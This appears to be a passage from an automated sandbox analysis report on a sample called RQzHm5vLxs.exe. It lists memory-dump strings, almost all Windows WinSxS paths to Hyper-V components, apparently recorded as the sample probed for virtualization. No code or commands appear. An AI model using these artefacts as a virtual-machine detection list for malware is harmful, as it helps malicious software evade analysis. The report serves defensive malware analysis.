              Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..ypervisor.resources_31bf3856ad364e35_10.0.19041.1_en-us_c2edb07518552135\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-h..rvisor-host-service_31bf3856ad364e35_10.0.19041.1_none_2246f2e6f0441379\Z
              Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052670242.0000000002580000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-ram-parser_31bf3856ad364e35_10.0.19041.1_none_a7bb53746630ebd3\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2113280642.0000000003B6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vsmb_31bf3856ad364e35_10.0.19041.1741_none_a3a0448c191b2fda\r\
              Source: RQzHm5vLxs.exe, 00000000.00000002.2925814967.0000000000782000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWz!
              Source: RQzHm5vLxs.exe, 00000000.00000003.2113280642.0000000003B6D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2119195822.0000000003B89000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-winsock-provider_31bf3856ad364e35_10.0.19041.867_none_b57fce26790eec13\n\=
              Source: RQzHm5vLxs.exe, 00000000.00000003.2113280642.0000000003B6D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2153961554.0000000003B73000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vid_31bf3856ad364e35_10.0.19041.546_none_58a869077fc6e2f7\f\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2062947711.0000000002586000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052670242.0000000002580000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-bpa_31bf3856ad364e35_10.0.19041.1_none_555170071aa29c2c\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-i..ationcomponents-rdv_31bf3856ad364e35_10.0.19041.1741_none_b62736d427ac1a0c\
              Source: RQzHm5vLxs.exe, 00000000.00000002.2927128604.000000000257D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-sysprep-provider_31bf3856ad364e35_10.0.19041.789_none_111728dc
              Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..ck-virtualizationv2_31bf3856ad364e35_10.0.19041.1_none_25a2ff96aac272dd\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2113280642.0000000003B6D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2119195822.0000000003B89000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-sysprep-provider_31bf3856ad364e35_10.0.19041.789_none_111728dc239a85e2\r\X!(
              Source: RQzHm5vLxs.exe, 00000000.00000003.2113280642.0000000003B6D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2119195822.0000000003B89000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-config_31bf3856ad364e35_10.0.19041.928_none_d35bf07ab5380c24\f\" R
              Source: RQzHm5vLxs.exe, 00000000.00000003.2113280642.0000000003B6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmwp_31bf3856ad364e35_10.0.19041.1949_none_a9b86d6c1534dc66\r\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmms.resources_31bf3856ad364e35_10.0.19041.1_en-us_fc0cba9450a52790\Z
              Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..-netsetup.resources_31bf3856ad364e35_10.0.19041.1_en-us_299ac5951a49c2de\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-h..t-service.resources_31bf3856ad364e35_10.0.19041.1_en-us_ddaeabc80a3525d6\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vsmb.resources_31bf3856ad364e35_10.0.19041.423_en-us_f14a4bbefe65ac87\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052670242.0000000002580000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vhd-parser_31bf3856ad364e35_10.0.19041.1_none_34b87765e20dcc15\l
              Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..edstorage.resources_31bf3856ad364e35_10.0.19041.1_en-us_8e6d1518accc0bf5\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2063224091.00000000024E8000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2113111290.00000000024DC000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2112907141.00000000024C3000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2120503693.00000000024E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-windows-hyper-v-vfpext_31bf3856ad364e35_10.0.19041.1741_none_7543ca68a11c7040\r\
              Source: RQzHm5vLxs.exe, 00000000.00000002.2927128604.000000000257D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-winsock-provid
              Source: RQzHm5vLxs.exe, 00000000.00000003.2216869042.0000000003B22000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2159477116.0000000003B13000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000002.2928139123.0000000003B2A000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2217250268.0000000003B22000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2130830938.0000000003B13000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2158900978.0000000003AFB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-synthfcvdev_31bf3856ad364e35_10.0.19041.1741_none_b365912b94b35a98\r\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2130830938.0000000003B13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-emulatedstorage_31bf3856ad364e35_10.0.19041.1741_none_4fe99c993cb84326\f\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..nthfcvdev.resources_31bf3856ad364e35_10.0.19041.1_en-us_6ca4b4247e291981\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2130830938.0000000003B13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..s-vmswitch-netsetup_31bf3856ad364e35_10.0.19041.2006_none_f93d3f541072d580\f\}2t
              Source: RQzHm5vLxs.exe, 00000000.00000002.2925814967.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000002.2925814967.000000000075B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: RQzHm5vLxs.exe, 00000000.00000003.2130830938.0000000003B13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.19041.2006_none_a526c6e91aabcb1b\r\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vid.resources_31bf3856ad364e35_10.0.19041.1_en-us_447494df1222bcd8\z
              Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-winhv_31bf3856ad364e35_10.0.19041.1_none_93cc37f483916b61\V
              Source: RQzHm5vLxs.exe, 00000000.00000002.2927128604.000000000257D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: indows\WinSxS\amd64_microsoft-hyper-v-management-clients_31bf3856ad364e35_10.0.19041.1_none_a87cce111f2d21d5\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2119162483.0000000003BB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-kmcl_31bf3856ad364e35_10.0.19041.1889_none_e7d7bde611c8c141\r\6sJ
              Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052670242.0000000002580000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vsmb_31bf3856ad364e35_10.0.19041.1741_none_a3a0448c191b2fda\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2062947711.0000000002586000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052670242.0000000002580000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-winhvr_31bf3856ad364e35_10.0.19041.1_none_fc5d2e67adee5611\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2130830938.0000000003B13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-i..ationcomponents-rdv_31bf3856ad364e35_10.0.19041.1741_none_b62736d427ac1a0c\r\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2158945262.000000000258D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2135558598.000000000258D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2062947711.000000000258D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2156041172.000000000258D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2146393174.000000000258D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2216977253.000000000258D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-emulatedstorage_31bf3856ad364e35_10.0.19041.1741_none_4fe99c993cb84326\e
              Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..failoverreplication_31bf3856ad364e35_10.0.19041.1_none_50b60ffc14c70fb2\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2156041172.000000000257D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2146393174.000000000257D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052813472.000000000257B000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2153761267.000000000257D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052687517.000000000256D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2113039589.000000000257D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-winsock-provider_31bf3856ad364e35_10.0.19041.867_none_b57fce26790eec13\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052670242.0000000002580000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-debug_31bf3856ad364e35_10.0.19041.1741_none_78a9b11b7a3cc41b\#
              Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-integration-rdv-core_31bf3856ad364e35_10.0.19041.964_none_3542494c595902f8\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-synthfcvdev_31bf3856ad364e35_10.0.19041.1741_none_b365912b94b35a98\:
              Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmwp.resources_31bf3856ad364e35_10.0.19041.1_en-us_369e8b635061fdb3\Z
              Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..lebrowser.resources_31bf3856ad364e35_10.0.19041.1_en-us_4373d0692dcd3a06\z
              Source: RQzHm5vLxs.exe, 00000000.00000003.2113280642.0000000003B6D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2119195822.0000000003B89000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-sysprep-provider_31bf3856ad364e35_10.0.19041.789_none_111728dc239a85e2\f\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052670242.0000000002580000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vid_31bf3856ad364e35_10.0.19041.546_none_58a869077fc6e2f7\b
              Source: RQzHm5vLxs.exe, 00000000.00000003.2130830938.0000000003B13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vsmb.resources_31bf3856ad364e35_10.0.19041.423_en-us_f14a4bbefe65ac87\r\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2113280642.0000000003B6D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2119195822.0000000003B89000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-config_31bf3856ad364e35_10.0.19041.928_none_d35bf07ab5380c24\r\I#'
              Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052548528.0000000002588000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-kmcl_31bf3856ad364e35_10.0.19041.1889_none_e7d7bde611c8c141\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2119162483.0000000003BB1000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2135529974.0000000003BCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-hgs_31bf3856ad364e35_10.0.19041.1741_none_1bf0e7c12b78479b\r\(
              Source: RQzHm5vLxs.exe, 00000000.00000003.2113280642.0000000003B6D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2119195822.0000000003B89000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-debug_31bf3856ad364e35_10.0.19041.1741_none_78a9b11b7a3cc41b\r\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2113280642.0000000003B6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vid_31bf3856ad364e35_10.0.19041.546_none_58a869077fc6e2f7\r\_
              Source: RQzHm5vLxs.exe, 00000000.00000003.2156041172.000000000257D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2146393174.000000000257D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052813472.000000000257B000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2153761267.000000000257D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052687517.000000000256D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2113039589.000000000257D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-management-clients_31bf3856ad364e35_10.0.19041.1_none_a87cce111f2d21d5\
              Source: RQzHm5vLxs.exe, 00000000.00000003.2113280642.0000000003B6D000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2153961554.0000000003B73000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmms_31bf3856ad364e35_10.0.19041.2006_none_ab6b7b2814133920\f\+
              Source: RQzHm5vLxs.exe, 00000000.00000003.2063224091.00000000024E8000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2113111290.00000000024DC000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2112907141.00000000024C3000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2119251929.00000000024EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-windows-hyper-v-vfpext_31bf3856ad364e35_10.0.19041.1741_none_7543ca68a11c7040\f\_
              Source: RQzHm5vLxs.exe, 00000000.00000003.2052386603.000000000252F000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052490662.0000000002553000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052670242.0000000002580000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052518413.000000000255E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmms_31bf3856ad364e35_10.0.19041.2006_none_ab6b7b2814133920\
